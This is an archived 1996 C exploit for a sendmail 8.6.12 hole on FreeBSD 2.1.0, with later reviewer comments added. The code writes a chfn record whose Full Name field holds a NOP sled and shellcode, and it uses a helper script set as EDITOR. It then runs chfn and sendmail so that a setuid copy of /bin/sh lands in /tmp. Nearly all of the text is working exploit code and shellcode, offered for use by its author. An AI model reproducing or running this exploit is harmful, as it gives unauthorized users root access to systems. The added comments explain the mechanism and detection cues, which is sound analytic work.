
  1.  
  2.         Exploit for sendmail security hole (version 8.6.12 for FreeBSD)
  3.                                        
  4.    Alexey Zakharov (leshka@chci.chuvashia.su)
  5.    Mon, 23 Sep 1996 10:56:39 -0400
  6.    
  7. /*                               Hi !                                       */
  8. /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */
  9. /* If you have any problems with it, send letter to me.                     */
  10. /*                             Have fun !                                   */
  11.  
  12.  
  13. /* -----------------   Dedicated to my beautiful lady   ------------------  */
  14. /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su                 */
  15.  
  16. #include <stdio.h>
      /* Entry point. Writes the two helper files (see make_files) and then runs a
       * fixed shell pipeline through system(). Nothing is checked: neither the
       * system() return value nor the exit status of any command in the string.
       * Pre-C99 implicit-int main with no return statement. */
  17. main()
  18. {
  19. void make_files();                       /* old-style declaration without a parameter list: the call below is not type-checked */
  20.      make_files();                       /* creates ./user.inf and ./hack in the current directory */
  21.      system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;
  22. echo See result in /tmp");               /* relies on chfn honouring EDITOR (a relative path, resolved in the cwd) and on PATH lookup of chfn; as archived this literal is wrapped across two physical lines */
  23. }
  24.  
      /* Builds the two files main() hands to chfn through EDITOR:
       *   user.inf - a chfn-style record whose "Full Name:" field is j bytes of
       *              0x90 followed by the bytes of code_string;
       *   hack     - a shell script chfn runs as its editor; it overwrites the
       *              file chfn passes as "$1" with user.inf and resets its mtime.
       * Both files are created relative to the current directory with the default
       * umask and are never removed. No return value; no error is reported.
       * The author's per-byte assembly comments are line-wrapped in the archive. */
  25. void make_files()
  26.  {
  27.   int i,j;                               /* j = padding length, assigned below; both are set before use */
  28.   FILE *f;
  29.   char nop_string[200];                  /* padding buffer; j is never compared against this size */
  30.   char code_string[]=                    /* adjacent literals concatenate into one array; sizeof includes the trailing NUL */
  31.                       {
  32.                          "\xeb\x50"                         /* jmp    cont */
  33.  
  34. /* geteip: */            "\x5d"                             /* popl   %ebp */
  35.                          "\x55"                             /* pushl  %ebp */
  36.                          "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc
  37. 3(%ebp) */
  38.                          "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd
  39. 7(%ebp) */
  40.                          "\xc3"                             /* ret */
  41.  
  42. /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"                  /* host artefact to look for: a copy of /bin/sh in /tmp ... */
  43. /* 0xffffffc3(%ebp): */ "\x3c"
  44.                         "chmod a=rsx /tmp/sh"              /* ... made set-uid/set-gid for everyone; file-integrity or /tmp setuid scans catch this */
  45. /* 0xffffffd7(%ebp): */ "\x01"
  46.                         "-leshka-leshka-leshka-leshka-"    /* reserved */
  47.  
  48. /* cont:  */            "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf7
  49. 0,%esp */
  50.                         "\xe8\xa5\xff\xff\xff"             /* call   geteip */
  51.                         "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xb4fffff
  52. f,%ebp */
  53.                         "\x55"                             /* pushl  %ebp */
  54.                         "\x55"                             /* pushl  %ebp */
  55.                         "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0
  56.   */
  57.                         "\xc3"                             /* ret */
  58.                         "-leshka-leshka-leshka-leshka-"    /* reserved */
  59.                         "\xa0\xcf\xbf\xef"                 /* absolute addresses above are fixed for one binary/OS build; no comment here explains them */
  60.                      };
  61.  
  62.   j=269-sizeof(code_string);             /* 269 is an unexplained magic total; the subtraction is unsigned (size_t), so a code_string larger than 269 would wrap before the int conversion */
  63.   for(i=0;i<j;nop_string[i++]='\x90');   /* fill the first j bytes with 0x90; nothing guards j < sizeof nop_string */
  64.   nop_string[j]='\0';
  65.  
  66.   f=fopen("user.inf","w");               /* unchecked: a NULL f makes every fprintf/fclose below undefined behaviour */
  67.   fprintf(f,"#Changing user database information for leshka\n");   /* evidently imitates the record chfn opens for editing; the user name is hard-coded */
  68.   fprintf(f,"Shell: /usr/local/bin/bash\n");
  69.   fprintf(f,"Location: \n");
  70.   fprintf(f,"Office Phone: \n");
  71.   fprintf(f,"Home Phone: \n");
  72.   fprintf(f,"Full Name: %s%s\n",nop_string,code_string);   /* %s stops at the first NUL, so code_string is written up to its terminator only */
  73.   fclose(f);                             /* return value ignored; a short write would go unnoticed */
  74.  
  75.   f=fopen("hack","w");                   /* unchecked, as above; the script is made executable by main(), not here */
  76.   fprintf(f,"cat user.inf>\"$1\"\n");    /* "$1" is the file chfn hands its editor; it is replaced wholesale */
  77.   fprintf(f,"touch -t 2510711313 \"$1\"\n");   /* NOTE(review): this -t value does not parse as a [[CC]YY]MMDDhhmm date on current touch; purpose unclear -- confirm against the 1996 BSD touch */
  78.   fclose(f);                             /* return value ignored */
  79.  }
  80.